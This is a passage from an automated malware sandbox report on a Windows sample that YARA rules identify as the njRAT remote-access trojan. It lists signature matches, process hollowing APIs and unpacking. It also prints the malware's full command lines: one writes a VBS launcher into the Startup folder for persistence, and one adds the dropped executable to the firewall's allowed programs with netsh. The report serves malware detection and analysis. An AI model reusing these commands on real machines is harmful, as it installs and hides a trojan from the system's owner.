        Source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: nOZ2Oqnzbz.exe.0.dr, caspol.csSecurity API names: mutex.SetAccessControl
        Source: nOZ2Oqnzbz.exe.0.dr, caspol.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: nOZ2Oqnzbz.exe.0.dr, caspol.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: nOZ2Oqnzbz.exe.0.dr, caspol.csSecurity API names: accessControl.AddAccessRule
        Source: nOZ2Oqnzbz.exe.0.dr, caspol.csSecurity API names: mutex.GetAccessControl
        Source: WindowsServices.exe.3.dr, caspol.csSecurity API names: mutex.SetAccessControl
        Source: WindowsServices.exe.3.dr, caspol.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: WindowsServices.exe.3.dr, caspol.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: WindowsServices.exe.3.dr, caspol.csSecurity API names: accessControl.AddAccessRule
        Source: WindowsServices.exe.3.dr, caspol.csSecurity API names: mutex.GetAccessControl
        Source: classification engineClassification label: mal100.phis.troj.adwa.spyw.expl.evad.winEXE@30/9@3/3
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeCode function: 3_2_00AAA8CA AdjustTokenPrivileges,3_2_00AAA8CA
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeCode function: 3_2_00AAA893 AdjustTokenPrivileges,3_2_00AAA893
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 12_2_00CBA8CA AdjustTokenPrivileges,12_2_00CBA8CA
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 12_2_00CBA893 AdjustTokenPrivileges,12_2_00CBA893
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 21_2_00C2A8CA AdjustTokenPrivileges,21_2_00C2A8CA
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 21_2_00C2A893 AdjustTokenPrivileges,21_2_00C2A893
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeCode function: 0_2_00405A10 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleFileNameW,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,wcscat,CreateProcessW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,WriteProcessMemory,ResumeThread,Wow64SuspendThread,WriteProcessMemory,wcscpy,wcscat,MoveFileExW,CopyFileW,ResumeThread,Sleep,CreateToolhelp32Snapshot,Module32First,strstr,Wow64SuspendThread,Wow64SuspendThread,FindCloseChangeNotification,DeleteFileW,ResumeThread,Sleep,DeleteFileW,Wow64SuspendThread,Sleep,MoveFileExW,ResumeThread,wcscat,wcsstr,CreateFileW,TerminateProcess,strstr,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,strstr,strstr,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,wcslen,CreateFileW,wcscat,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc,CreateProcessA,Sleep,TerminateProcess,0_2_00405A10
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeFile created: C:\Users\user\Desktop\nOZ2Oqnzbz.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6224:120:WilError_03
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMutant created: \Sessions\1\BaseNamedObjects\bf497657d005804b657fde8dd2d0cb46
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6304:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_03
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeFile created: C:\Users\user\AppData\Local\Temp\WindowsServices.exeJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\nOZ2Oqnzbz.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
        Source: nOZ2Oqnzbz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: nOZ2Oqnzbz.exeReversingLabs: Detection: 86%
        Source: nOZ2Oqnzbz.exeVirustotal: Detection: 86%
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeFile read: C:\Users\user\Desktop\nOZ2Oqnzbz.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\nOZ2Oqnzbz.exe C:\Users\user\Desktop\nOZ2Oqnzbz.exe
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\nOZ2Oqnzbz.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess created: C:\Users\user\Desktop\nOZ2Oqnzbz.exe C:\Users\user\Desktop\nOZ2Oqnzbz.exe
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe "C:\Users\user\AppData\Local\Temp\WindowsServices.exe"
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe
        Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe "C:\Users\user\AppData\Local\Temp\WindowsServices.exe"
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLE
        Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\nOZ2Oqnzbz.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"Jump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess created: C:\Users\user\Desktop\nOZ2Oqnzbz.exe C:\Users\user\Desktop\nOZ2Oqnzbz.exeJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLEJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
        Source: Binary string: caspol.pdbx source: nOZ2Oqnzbz.exe, 00000000.00000002.1624289078.000000000066B000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000004.00000003.1705907869.0000000000781000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000009.00000002.1738164335.000000000073E000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000012.00000002.1941548771.000000000073E000.00000004.00000020.00020000.00000000.sdmp, nOZ2Oqnzbz.exe.0.dr, WindowsServices.exe.3.dr
        Source: Binary string: caspol.pdb source: nOZ2Oqnzbz.exe, 00000000.00000002.1624289078.000000000066B000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000004.00000003.1705907869.0000000000781000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000009.00000002.1738164335.000000000073E000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000012.00000002.1941548771.000000000073E000.00000004.00000020.00020000.00000000.sdmp, nOZ2Oqnzbz.exe.0.dr, WindowsServices.exe.3.dr

        Data Obfuscation

        barindex
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeUnpacked PE file: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeUnpacked PE file: 12.2.WindowsServices.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeUnpacked PE file: 21.2.WindowsServices.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeUnpacked PE file: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeUnpacked PE file: 12.2.WindowsServices.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeUnpacked PE file: 21.2.WindowsServices.exe.400000.0.unpack
        Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, OK.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
        Source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, OK.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
        Source: 9.2.WindowsServices.exe.710000.1.raw.unpack, OK.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
        Source: 18.2.WindowsServices.exe.710000.2.raw.unpack, OK.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeCode function: 0_2_00405A10 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleFileNameW,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,wcscat,CreateProcessW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,WriteProcessMemory,ResumeThread,Wow64SuspendThread,WriteProcessMemory,wcscpy,wcscat,MoveFileExW,CopyFileW,ResumeThread,Sleep,CreateToolhelp32Snapshot,Module32First,strstr,Wow64SuspendThread,Wow64SuspendThread,FindCloseChangeNotification,DeleteFileW,ResumeThread,Sleep,DeleteFileW,Wow64SuspendThread,Sleep,MoveFileExW,ResumeThread,wcscat,wcsstr,CreateFileW,TerminateProcess,strstr,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,strstr,strstr,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,wcslen,CreateFileW,wcscat,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc,CreateProcessA,Sleep,TerminateProcess,0_2_00405A10
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeCode function: 0_2_0040B0E0 push eax; ret 0_2_0040B10E
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 21_2_00E90069 push ds; ret 21_2_00E9006A
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 21_2_00E90045 push ds; ret 21_2_00E90062

        Persistence and Installation Behavior

        barindex
